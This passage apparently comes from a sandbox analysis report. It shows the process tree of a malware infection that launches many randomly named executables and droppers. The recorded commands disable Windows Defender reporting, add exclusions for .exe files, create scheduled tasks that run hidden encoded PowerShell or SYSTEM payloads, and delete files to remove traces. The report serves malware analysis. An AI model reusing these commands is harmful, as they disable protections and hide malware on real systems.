  - - C:\Users\Admin\Pictures\rAo2xVC52DszFJbX67a3BNX0.exe
      "C:\Users\Admin\Pictures\rAo2xVC52DszFJbX67a3BNX0.exe"
      4⤵
      PID:3604
    - - C:\Users\Admin\Pictures\rAo2xVC52DszFJbX67a3BNX0.exe
        
        "C:\Users\Admin\Pictures\rAo2xVC52DszFJbX67a3BNX0.exe"
        5⤵
        
        PID:5504
  - - C:\Users\Admin\Pictures\HoGkR8EIhIBUBzYf9ei8FpvR.exe
      "C:\Users\Admin\Pictures\HoGkR8EIhIBUBzYf9ei8FpvR.exe"
      4⤵
      PID:4748
  - - C:\Users\Admin\Pictures\I4CToCRwKkgfySmphYt19YXG.exe
      "C:\Users\Admin\Pictures\I4CToCRwKkgfySmphYt19YXG.exe"
      4⤵
      PID:888
  - - C:\Users\Admin\Pictures\m3T0ksxcrhFpGi34fsNP4EQe.exe
      "C:\Users\Admin\Pictures\m3T0ksxcrhFpGi34fsNP4EQe.exe" --silent --allusers=0
      4⤵
      PID:3592
    - - C:\Users\Admin\Pictures\m3T0ksxcrhFpGi34fsNP4EQe.exe
        
        C:\Users\Admin\Pictures\m3T0ksxcrhFpGi34fsNP4EQe.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6e0b8538,0x6e0b8548,0x6e0b8554
        5⤵
        
        PID:1368
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\m3T0ksxcrhFpGi34fsNP4EQe.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\m3T0ksxcrhFpGi34fsNP4EQe.exe" --version
        5⤵
        
        PID:4312
    - - C:\Users\Admin\Pictures\m3T0ksxcrhFpGi34fsNP4EQe.exe
        
        "C:\Users\Admin\Pictures\m3T0ksxcrhFpGi34fsNP4EQe.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3592 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231021112703" --session-guid=78cddaf5-876a-4968-a18f-180c451f7bf0 --server-tracking-blob=ODA0Mzc1MTViMTlmMWVkMWVlOTJmZjUxZGY3YTkyYzI0MWY0ODZmYmFkNTg4ZWJmOWUyMDM0OGYzZjk1YmJhNjp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5Nzg4NzYyMS4wMzQ1IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJiMjY1NzkxYS0xNmNkLTRmZTEtYjAzZS0yNjU0Y2UyZmM0NmIifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=AC04000000000000
        5⤵
        
        PID:5352
      - C:\Users\Admin\Pictures\m3T0ksxcrhFpGi34fsNP4EQe.exe
        
        C:\Users\Admin\Pictures\m3T0ksxcrhFpGi34fsNP4EQe.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2c4,0x2c8,0x2cc,0x294,0x2d0,0x6d6f8538,0x6d6f8548,0x6d6f8554
        6⤵
        
        PID:5448
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310211127031\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310211127031\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"
        5⤵
        
        PID:3956
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310211127031\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310211127031\assistant\assistant_installer.exe" --version
        5⤵
        
        PID:5704
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310211127031\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310211127031\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0xb31588,0xb31598,0xb315a4
        6⤵
        
        PID:3248
  - - C:\Users\Admin\Pictures\iZH4EPhJRT9EV7jDyaf0NiSC.exe
      "C:\Users\Admin\Pictures\iZH4EPhJRT9EV7jDyaf0NiSC.exe"
      4⤵
      PID:4596
  - - C:\Users\Admin\Pictures\7HjVPG6sCE05dKsCYjKCutsz.exe
      "C:\Users\Admin\Pictures\7HjVPG6sCE05dKsCYjKCutsz.exe"
      4⤵
      PID:5172
  - - C:\Users\Admin\Pictures\xK43DHPBjWtZ1SygB8rGTNFP.exe
      "C:\Users\Admin\Pictures\xK43DHPBjWtZ1SygB8rGTNFP.exe"
      4⤵
      PID:5756
  - - C:\Users\Admin\Pictures\xZm7QiFyP9kbq1yQba3TEJy4.exe
      "C:\Users\Admin\Pictures\xZm7QiFyP9kbq1yQba3TEJy4.exe"
      4⤵
      PID:2812
    - - C:\Users\Admin\AppData\Local\Temp\7zS5464.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:6228
      - C:\Users\Admin\AppData\Local\Temp\7zS5772.tmp\Install.exe
        
        .\Install.exe /dcCcdidRiisJ "385118" /S
        6⤵
        
        PID:6764
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:5308
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:6332
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        9⤵
        
        PID:8232
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        9⤵
        
        PID:9084
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:8844
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:9464
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:9968
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:2816
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "ghjzjhJhR" /SC once /ST 00:11:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:7820
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "ghjzjhJhR"
        7⤵
        
        PID:9992
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "ghjzjhJhR"
        7⤵
        
        PID:9508
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 11:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\CmvDCJQ.exe\" 3Y /yKsite_idvYl 385118 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:6452
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bwpFiyeZPJPVdaMxTt"
        7⤵
        
        PID:10816
  - - C:\Users\Admin\Pictures\Rn9tn1od2qnZjye7yeMZSGxg.exe
      "C:\Users\Admin\Pictures\Rn9tn1od2qnZjye7yeMZSGxg.exe"
      4⤵
      PID:1104
  - - C:\Users\Admin\Pictures\isntR2Qwdj6pZ4tH2OaD7UaF.exe
      "C:\Users\Admin\Pictures\isntR2Qwdj6pZ4tH2OaD7UaF.exe"
      4⤵
      PID:1312
    - - C:\Users\Admin\Pictures\isntR2Qwdj6pZ4tH2OaD7UaF.exe
        
        "C:\Users\Admin\Pictures\isntR2Qwdj6pZ4tH2OaD7UaF.exe"
        5⤵
        
        PID:2276
  - - C:\Users\Admin\Pictures\6UcJxdvzB9ntOjoVXbKAgMJC.exe
      "C:\Users\Admin\Pictures\6UcJxdvzB9ntOjoVXbKAgMJC.exe"
      4⤵
      PID:508
  - - C:\Users\Admin\Pictures\0r9FzA244FYuELsoSq6iURUs.exe
      "C:\Users\Admin\Pictures\0r9FzA244FYuELsoSq6iURUs.exe"
      4⤵
      PID:9196
  - - C:\Users\Admin\Pictures\FWNvQQBNSiMgPRYQQT1Z5mgN.exe
      "C:\Users\Admin\Pictures\FWNvQQBNSiMgPRYQQT1Z5mgN.exe"
      4⤵
      PID:7780
  - - C:\Users\Admin\Pictures\wyvVEvw300A4Bk1ohaAnxEC3.exe
      "C:\Users\Admin\Pictures\wyvVEvw300A4Bk1ohaAnxEC3.exe"
      4⤵
      PID:1900
  - - C:\Users\Admin\Pictures\ukA9Uji70B9i42bU1anmGjji.exe
      "C:\Users\Admin\Pictures\ukA9Uji70B9i42bU1anmGjji.exe"
      4⤵
      PID:10748
  - - C:\Users\Admin\Pictures\CbSUUtdErXlMzabfrE1OvyGB.exe
      "C:\Users\Admin\Pictures\CbSUUtdErXlMzabfrE1OvyGB.exe"
      4⤵
      PID:4268
  - - C:\Users\Admin\Pictures\OkQf7ZTkeIBCe6ZeauB7f7zz.exe
      "C:\Users\Admin\Pictures\OkQf7ZTkeIBCe6ZeauB7f7zz.exe" --silent --allusers=0
      4⤵
      PID:4624
    - - C:\Users\Admin\Pictures\OkQf7ZTkeIBCe6ZeauB7f7zz.exe
        
        C:\Users\Admin\Pictures\OkQf7ZTkeIBCe6ZeauB7f7zz.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x65b58538,0x65b58548,0x65b58554
        5⤵
        
        PID:9500
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\OkQf7ZTkeIBCe6ZeauB7f7zz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\OkQf7ZTkeIBCe6ZeauB7f7zz.exe" --version
        5⤵
        
        PID:9888
  - - C:\Users\Admin\Pictures\eGAWiesRx0F5k8LciBVsQ2Tz.exe
      "C:\Users\Admin\Pictures\eGAWiesRx0F5k8LciBVsQ2Tz.exe"
      4⤵
      PID:2552
    - - C:\Users\Admin\AppData\Local\Temp\7zS31C1.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:10920
      - C:\Users\Admin\AppData\Local\Temp\7zS3AAA.tmp\Install.exe
        
        .\Install.exe /dcCcdidRiisJ "385118" /S
        6⤵
        
        PID:2488
- C:\Users\Admin\AppData\Local\Temp\a\system32.exe
  "C:\Users\Admin\AppData\Local\Temp\a\system32.exe"
  2⤵
  PID:4368
- C:\Users\Admin\AppData\Local\Temp\a\angel.exe
  "C:\Users\Admin\AppData\Local\Temp\a\angel.exe"
  2⤵
  PID:2896
- C:\Users\Admin\AppData\Local\Temp\a\Ads.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Ads.exe"
  2⤵
  PID:2788
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:4768
  - - C:\Users\Admin\Pictures\QTKLOfBzDzIZNtIoNYEJAFUO.exe
      "C:\Users\Admin\Pictures\QTKLOfBzDzIZNtIoNYEJAFUO.exe"
      4⤵
      PID:5468
  - - C:\Users\Admin\Pictures\8XOaVUYE2N1twjn9petvcqgz.exe
      "C:\Users\Admin\Pictures\8XOaVUYE2N1twjn9petvcqgz.exe"
      4⤵
      PID:5692
  - - C:\Users\Admin\Pictures\iQGqiSDyQQoQaJ2VtNXMZkoZ.exe
      "C:\Users\Admin\Pictures\iQGqiSDyQQoQaJ2VtNXMZkoZ.exe"
      4⤵
      PID:5864
  - - C:\Users\Admin\Pictures\lPPgoYGzRerGGAm6MmQwB6b7.exe
      "C:\Users\Admin\Pictures\lPPgoYGzRerGGAm6MmQwB6b7.exe"
      4⤵
      PID:5672
  - - C:\Users\Admin\Pictures\wRkVuypCxAypFBiWyZkeze9Z.exe
      "C:\Users\Admin\Pictures\wRkVuypCxAypFBiWyZkeze9Z.exe"
      4⤵
      PID:3612
    - - C:\Users\Admin\Pictures\wRkVuypCxAypFBiWyZkeze9Z.exe
        
        "C:\Users\Admin\Pictures\wRkVuypCxAypFBiWyZkeze9Z.exe"
        5⤵
        
        PID:6616
  - - C:\Users\Admin\Pictures\gw8QxDRic7zWV4FdGCDO7gJf.exe
      "C:\Users\Admin\Pictures\gw8QxDRic7zWV4FdGCDO7gJf.exe" --silent --allusers=0
      4⤵
      PID:1140
    - - C:\Users\Admin\Pictures\gw8QxDRic7zWV4FdGCDO7gJf.exe
        
        C:\Users\Admin\Pictures\gw8QxDRic7zWV4FdGCDO7gJf.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6cb48538,0x6cb48548,0x6cb48554
        5⤵
        
        PID:5336
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\gw8QxDRic7zWV4FdGCDO7gJf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\gw8QxDRic7zWV4FdGCDO7gJf.exe" --version
        5⤵
        
        PID:5628
  - - C:\Users\Admin\Pictures\6w2s1h97N5M9eaJ2haUupjzO.exe
      "C:\Users\Admin\Pictures\6w2s1h97N5M9eaJ2haUupjzO.exe"
      4⤵
      PID:5588
  - - C:\Users\Admin\Pictures\vCxS6wWRRwxC9fHt1owUsyRh.exe
      "C:\Users\Admin\Pictures\vCxS6wWRRwxC9fHt1owUsyRh.exe"
      4⤵
      PID:7040
    - - C:\Users\Admin\AppData\Local\Temp\7zS6DF7.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:5812
      - C:\Users\Admin\AppData\Local\Temp\7zS7182.tmp\Install.exe
        
        .\Install.exe /dcCcdidRiisJ "385118" /S
        6⤵
        
        PID:6712
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:5484
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:9764
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:1312
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:6816
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:656
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:1764
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        9⤵
        
        PID:9800
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        9⤵
        
        PID:10052
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gAzfpzwzg" /SC once /ST 03:48:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:8312
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gAzfpzwzg"
        7⤵
        
        PID:2816
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gAzfpzwzg"
        7⤵
        
        PID:5116
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 11:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\XzjGDyJ.exe\" 3Y /ESsite_idyez 385118 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:10136
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bwpFiyeZPJPVdaMxTt"
        7⤵
        
        PID:11336
  - - C:\Users\Admin\Pictures\n69dc9ct9vgsFDMPsu3hoYmM.exe
      "C:\Users\Admin\Pictures\n69dc9ct9vgsFDMPsu3hoYmM.exe"
      4⤵
      PID:11244
  - - C:\Users\Admin\Pictures\fR8XVRvtR0spBHPPpFgZeLq7.exe
      "C:\Users\Admin\Pictures\fR8XVRvtR0spBHPPpFgZeLq7.exe"
      4⤵
      PID:4668
    - - C:\Users\Admin\Pictures\fR8XVRvtR0spBHPPpFgZeLq7.exe
        
        "C:\Users\Admin\Pictures\fR8XVRvtR0spBHPPpFgZeLq7.exe"
        5⤵
        
        PID:10852
  - - C:\Users\Admin\Pictures\QHu9uJkPvnfxA5p4X9bMshMg.exe
      "C:\Users\Admin\Pictures\QHu9uJkPvnfxA5p4X9bMshMg.exe"
      4⤵
      PID:8084
  - - C:\Users\Admin\Pictures\2jbBAPThJEn2p7F4fOhG7P9Z.exe
      "C:\Users\Admin\Pictures\2jbBAPThJEn2p7F4fOhG7P9Z.exe"
      4⤵
      PID:11180
  - - C:\Users\Admin\Pictures\KhlRggzJCdDDq6TPmRPnUCLF.exe
      "C:\Users\Admin\Pictures\KhlRggzJCdDDq6TPmRPnUCLF.exe"
      4⤵
      PID:9800
  - - C:\Users\Admin\Pictures\LMarDzsiYZ8wsIjEAzdOnS98.exe
      "C:\Users\Admin\Pictures\LMarDzsiYZ8wsIjEAzdOnS98.exe"
      4⤵
      PID:7204
  - - C:\Users\Admin\Pictures\v7aB3UusrVA0I5IRWrlr68c9.exe
      "C:\Users\Admin\Pictures\v7aB3UusrVA0I5IRWrlr68c9.exe" --silent --allusers=0
      4⤵
      PID:5896
    - - C:\Users\Admin\Pictures\v7aB3UusrVA0I5IRWrlr68c9.exe
        
        C:\Users\Admin\Pictures\v7aB3UusrVA0I5IRWrlr68c9.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x66038538,0x66038548,0x66038554
        5⤵
        
        PID:1512
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\v7aB3UusrVA0I5IRWrlr68c9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\v7aB3UusrVA0I5IRWrlr68c9.exe" --version
        5⤵
        
        PID:8756
  - - C:\Users\Admin\Pictures\ss9OktLoM5rYNA8JQkiZUy2W.exe
      "C:\Users\Admin\Pictures\ss9OktLoM5rYNA8JQkiZUy2W.exe"
      4⤵
      PID:9408
    - - C:\Users\Admin\AppData\Local\Temp\7zS25DA.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:9824
      - C:\Users\Admin\AppData\Local\Temp\7zS2CFE.tmp\Install.exe
        
        .\Install.exe /dcCcdidRiisJ "385118" /S
        6⤵
        
        PID:5580
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:12572
- C:\Users\Admin\AppData\Local\Temp\a\sogn.exe
  "C:\Users\Admin\AppData\Local\Temp\a\sogn.exe"
  2⤵
  PID:5272
- - C:\Users\Admin\AppData\Local\Temp\a\sogn.exe
    "C:\Users\Admin\AppData\Local\Temp\a\sogn.exe"
    3⤵
    PID:8028
- - C:\Users\Admin\AppData\Local\Temp\a\sogn.exe
    "C:\Users\Admin\AppData\Local\Temp\a\sogn.exe"
    3⤵
    PID:8116
- C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe"
  2⤵
  PID:5484
- - C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe"
    3⤵
    PID:4720
- C:\Users\Admin\AppData\Local\Temp\a\abun.exe
  "C:\Users\Admin\AppData\Local\Temp\a\abun.exe"
  2⤵
  PID:5704
- - C:\Users\Admin\AppData\Local\Temp\a\abun.exe
    "C:\Users\Admin\AppData\Local\Temp\a\abun.exe"
    3⤵
    PID:7996
- - C:\Users\Admin\AppData\Local\Temp\a\abun.exe
    "C:\Users\Admin\AppData\Local\Temp\a\abun.exe"
    3⤵
    PID:7864
- C:\Users\Admin\AppData\Local\Temp\a\obizx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\obizx.exe"
  2⤵
  PID:5940
- - C:\Users\Admin\AppData\Local\Temp\a\obizx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\obizx.exe"
    3⤵
    PID:6480
- C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe
  "C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe"
  2⤵
  PID:5748
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe" & del "C:\ProgramData\*.dll"" & exit
    3⤵
    PID:7408
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      Delays execution with timeout.exe
      PID:9092
- C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe"
  2⤵
  PID:3352
- - C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe
    C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe
    3⤵
    PID:4568
- C:\Users\Admin\AppData\Local\Temp\a\PO.pdf.exe
  "C:\Users\Admin\AppData\Local\Temp\a\PO.pdf.exe"
  2⤵
  PID:5536
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe"
    3⤵
    PID:5244
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe"
      4⤵
      PID:4524
- C:\Users\Admin\AppData\Local\Temp\a\DH.exe
  "C:\Users\Admin\AppData\Local\Temp\a\DH.exe"
  2⤵
  PID:6192
